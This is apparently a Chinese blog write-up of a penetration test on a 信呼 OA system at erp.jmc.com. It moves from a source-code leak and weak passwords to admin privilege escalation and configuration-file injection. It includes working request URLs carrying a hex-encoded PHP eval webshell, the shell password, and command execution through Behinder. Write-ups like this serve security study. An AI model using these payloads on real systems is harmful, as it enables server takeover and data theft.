前言

不是星標不推送文章了。

師傅也不想吧~

快把極夢C設置成星標吧。

信息收集?

目標為jmc.com

收集到了一個子域名 erp.jmc.com子域名

發現子域名存在一個源碼泄漏漏洞。

其中oa.zip是源碼。

其余都是一個登錄頁面。

這里重點是oa的登錄頁面。

oa是信乎OA,根據oa.zip泄漏.找到了公司名單。存在幾個弱口令。


第一步查看歷史漏洞。

發現泄漏出來的漏洞,如果想getshell全部都在后臺。

后臺文件上傳getshell

后臺配置文件getshell

不過都需要是管理員的情況下。

如何獲取管理員呢?這里查看歷史漏洞沒有發現什么有價值的。???

這里利用了獨家秘方的一個越權漏洞。修改+新建把普通用戶改成了管理員。

PS:經過本地測試,這里修改后普通用戶會存在一些bug。謹慎使用!?????????

上傳webshell就簡單了。--網上很多教程。????

這里利用了后臺配置文件上傳進行getshell,??????

因為是寫入了配置文件,對目標頁面會有危險。????????????????????

在寫入后抓緊復原。

/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=21,id=1,name=0x610A6576616C28245F504F53545B315D293B2F2F

清除COOKIES再登錄系統 --> 發包:/index.php?a=savecong&m=cog&d=system&ajaxbool=true&rnd=705961

根據教材走,這里就已經成功上傳了webshell。shell地址:http://erp.jmc.com/密碼為1

然后上傳一個新的馬,恢復配置文件。

無法進行命令執行。

全部亂碼。修改編碼也沒啥用。

這里要不把所有的webshell管理工具都嘗試一遍,要不就上傳php文件嘗試。

這里選擇了上傳phpinfo,發現并未禁用參數。

又上傳了system(whoami),發現也是可以成功執行的。

然后利用冰蝎成功命令執行。